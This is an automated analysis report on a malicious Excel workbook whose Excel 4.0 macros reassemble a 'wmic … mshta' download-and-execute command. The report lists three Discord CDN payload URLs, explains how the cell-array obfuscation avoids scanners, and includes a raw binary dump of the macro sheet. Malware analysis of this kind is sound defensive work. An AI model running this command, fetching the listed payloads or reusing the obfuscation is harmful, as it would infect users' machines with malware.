Office (OOXML) malware analysis — malicious · 415e91f29a1b002f

MALICIOUS

Office (OOXML)

84.2 KB Created: 2021-10-27 10:31:49 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-11-24

MD5: 03746d7b963f3a733d0b01bbe2924f9a SHA-1: 6d9b880320996903e94fe68397249c1ba402d276 SHA-256: 415e91f29a1b002f3ed8f15a6ee7bde18f58d10c4632d25e378d952283ece968

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros that are designed to execute a command. This command, 'wmic process call create 'mshta C:\ProgramData\excel.rtf'', is intended to download and execute a second-stage payload from one of the provided URLs. The use of XLM macros and the execution of an external command via wmic points to a downloader or dropper functionality.

Heuristics 4

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD

An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
URL reconstructed from XLM cell array (3 URLs) critical OOXML_XLM_CELL_ARRAY_URL

Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://cdn.discordapp.com/attachments/906996518161113190/907981832300134430/ptddXOVKUo.mov Referenced by macro
- https://cdn.discordapp.com/attachments/906996518161113190/907981690901774346/PYCMhlvK.movReferenced by macro
- https://cdn.discordapp.com/attachments/907663849111556109/907974662418477056/egehHsKdkrsJ.movReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 68617 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.bin`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.bin	68617 bytes
SHA-256: `20a7d336058acc483315c2c52054b7791816f9039e611d8b6eaffec7ce4bc113`
Preview script First 1,000 lines of the extracted script � � � @ �� ( B � � � @ d � $ � � � �� , � , � C : \ P r o g r a m D a t a \ @ @ @ @ @ e @ @ x @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ c e l . @ @ r t @ @ @ @ @ @ @ @ f @ @ B � � : w m i c p r o c e s s c a l l c r e a t e ' m s h t a C : \ P r o g r a m D a t a \ e x c e l . r t f ' L w m i c p r o c e Ao s s c a l l c r e a t e ' m s h t a @ C : \ P r o g r a m D a t a \ @ @ e x c @ @ e l @ . r t f @ ' @ � , 8 B 8 N@ 9 �@@ : Q@ ; �S@ < �P@ = U@ > @V@ ? T@ @ @Q@ A @@ B Z@ � , 8 B 8 ]@ 9 @[@ : [@ ; O@ < @ = $@ > N@ ? Z@ @ ]@ A @[@ B [@ � , 8 B 8 O@ 9 @ : $@ ; N@ < Z@ = @Y@ > @X@ ? Y@ @ O@ A @ B $@ � , 8 B 8 N@ 9 R@ : U@ ; @P@ < M@ = @P@ > T@ ? T@ @ S@ A @R@ B �P@ � , 8 B 8 @P@ 9 U@ : @R@ ; �S@ < �S@ = @@ > @R@ ? Q@ @ �N@ A A@ B �P@ � , 8 B 8 �T@ 9 A@ : @ ; $@ < @P@ = T@ > T@ ? S@ @ @R@ A �P@ B @P@ � , 8 B 8 U@ 9 @R@ : �S@ ; �S@ < �S@ = @P@ > @S@ ? @Q@ @ �N@ A A@ B U@ � , 8 B 8 @Y@ 9 �\@ : ]@ ; A@ < @ = $@ > �U@ ? @R@ @ �S@ A Q@ B �S@ � , 8 B 8 �U@ 9 �T@ : U@ ; @P@ < U@ = @Q@ > �N@ ? A@ @ @[@ A @Z@ B �[@ � , 8 B 8 @Z@ 9 @[@ : @Z@ ; �^@ < @Y@ = A@ > @ ? $@ @ @S@ A @P@ B V@ � , 8 B 8 @R@ 9 @S@ : @R@ ; �V@ < @Q@ = �P@ > @U@ ? U@ @ U@ A �S@ B �S@ � , 8 B 8 �N@ 9 A@ : �[@ ; �[@ < A@ = @ > $@ ? @S@ @ @R@ A �S@ B @R@ � , 8 B 8 @S@ 9 @R@ : �V@ ; @Q@ < �P@ = @U@ > U@ ? U@ @ �S@ A �S@ B �N@ � , 8 B 8 A@ 9 �[@ : �[@ ; A@ < @ = $@ > �P@ ? @P@ @ T@ A U@ B @R@ � , 8 B 8 �S@ 9 �S@ : �N@ ; A@ < �[@ = �[@ > A@ ? @ @ $@ A �T@ B R@ � , 8 B 8 �S@ 9 �U@ : @R@ ; �S@ < U@ = @P@ > �T@ ? �R@ @ �P@ A @P@ B �T@ � , 8 B 8 �N@ 9 A@ : �[@ ; �[@ < A@ = O@ > @ ? $@ @ N@ A �\@ B �X@ � , 8 B 8 �\@ 9 @Z@ : \ ... (truncated)

SHA-256: 20a7d336058acc483315c2c52054b7791816f9039e611d8b6eaffec7ce4bc113

Preview script

First 1,000 lines of the extracted script

�  �  �   @      ��������    �      (       B   �  �  �             @   d           � $                                    �  �  �  ����  ,     �            ,                
�                 	 C : \ P r o g r a    m D a t a \   @      @    @      @    @     e  @    @     x  @    @      @    @      @    @      @    @      @    @      @    @      @    @      @    @      @    @     c e l .  @    @     r t  @    @      @    @      @    @      @    @     f  @    @     B �      �         :   w m i c   p r o c e s s   c a l l   c r e a t e   ' m s h t a   C : \ P r o g r a m D a t a \ e x c e l . r t f '     L      w m        i c                                                                   p r o     c   e Ao                 s s   c     a l l   c     r e                 a t e                                   ' m s     h t a     @     C : \ P r o g r a m D a t a \  @    @     e x c  @    @     e l  @      .     r t f   @     '    @         �       ,        8   B     8         N@  9        �@@  :         Q@  ;        �S@  <        �P@  =         U@  >        @V@  ?         T@  @        @Q@  A         @@  B         Z@  �       ,        8   B     8         ]@  9        @[@  :         [@  ;         O@  <         *@  =         $@  >         N@  ?         Z@  @         ]@  A        @[@  B         [@  �       ,        8   B     8         O@  9         *@  :         $@  ;         N@  <         Z@  =        @Y@  >        @X@  ?         Y@  @         O@  A         *@  B         $@  �       ,        8   B     8         N@  9         R@  :         U@  ;        @P@  <         M@  =        @P@  >         T@  ?         T@  @         S@  A        @R@  B        �P@  �       ,        8   B     8        @P@  9         U@  :        @R@  ;        �S@  <        �S@  =         @@  >        @R@  ?         Q@  @        �N@  A         A@  B        �P@  �       ,        8   B     8        �T@  9         A@  :         *@  ;         $@  <        @P@  =         T@  >         T@  ?         S@  @        @R@  A        �P@  B        @P@  �       ,        8   B     8         U@  9        @R@  :        �S@  ;        �S@  <        �S@  =        @P@  >        @S@  ?        @Q@  @        �N@  A         A@  B         U@  �       ,        8   B     8        @Y@  9        �\@  :         ]@  ;         A@  <         *@  =         $@  >        �U@  ?        @R@  @        �S@  A         Q@  B        �S@  �       ,        8   B     8        �U@  9        �T@  :         U@  ;        @P@  <         U@  =        @Q@  >        �N@  ?         A@  @        @[@  A        @Z@  B        �[@  �       ,        8   B     8        @Z@  9        @[@  :        @Z@  ;        �^@  <        @Y@  =         A@  >         *@  ?         $@  @        @S@  A        @P@  B         V@  �       ,        8   B     8        @R@  9        @S@  :        @R@  ;        �V@  <        @Q@  =        �P@  >        @U@  ?         U@  @         U@  A        �S@  B        �S@  �       ,        8   B     8        �N@  9         A@  :        �[@  ;        �[@  <         A@  =         *@  >         $@  ?        @S@  @        @R@  A        �S@  B        @R@  �       ,        8   B     8        @S@  9        @R@  :        �V@  ;        @Q@  <        �P@  =        @U@  >         U@  ?         U@  @        �S@  A        �S@  B        �N@  �       ,        8   B     8         A@  9        �[@  :        �[@  ;         A@  <         *@  =         $@  >        �P@  ?        @P@  @         T@  A         U@  B        @R@  �       ,        8   B     8        �S@  9        �S@  :        �N@  ;         A@  <        �[@  =        �[@  >         A@  ?         *@  @         $@  A        �T@  B         R@  �       ,        8   B     8        �S@  9        �U@  :        @R@  ;        �S@  <         U@  =        @P@  >        �T@  ?        �R@  @        �P@  A        @P@  B        �T@  �       ,        8   B     8        �N@  9         A@  :        �[@  ;        �[@  <         A@  =         O@  >         *@  ?         $@  @         N@  A        �\@  B        �X@  �       ,        8   B     8        �\@  9        @Z@  :         \
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.